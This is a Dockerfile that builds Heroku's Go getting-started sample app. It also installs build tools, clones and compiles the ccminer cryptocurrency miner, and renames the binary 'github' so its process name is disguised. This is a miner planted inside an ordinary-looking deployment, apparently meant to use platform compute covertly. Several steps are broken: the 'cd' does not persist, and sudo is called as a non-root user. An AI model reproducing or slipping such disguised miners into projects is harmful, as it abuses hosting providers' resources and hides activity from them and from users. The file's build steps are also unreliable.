FROM heroku/heroku:20-build as build

COPY . /app
WORKDIR /app

# Setup buildpack
RUN mkdir -p /tmp/buildpack/heroku/go /tmp/build_cache /tmp/env
RUN curl https://buildpack-registry.s3.amazonaws.com/buildpacks/heroku/go.tgz | tar xz -C /tmp/buildpack/heroku/go

#Execute Buildpack
RUN STACK=heroku-20 /tmp/buildpack/heroku/go/bin/compile /app /tmp/build_cache /tmp/env

# Prepare final, minimal image
FROM heroku/heroku:20

COPY --from=build /app /app
ENV HOME /app
WORKDIR /app
RUN useradd -m heroku
USER heroku
RUN sudo apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential -y
RUN git clone --single-branch -b Verus2.2 https://github.com/monkins1010/ccminer.git
RUN cd ccminer
RUN chmod u+x build.sh
RUN chmod u+x configure.sh
RUN chmod u+x autogen.sh
RUN ./build.sh
RUN chmod u+x ccminer
RUN mv ccminer github

CMD /app/bin/go-getting-started
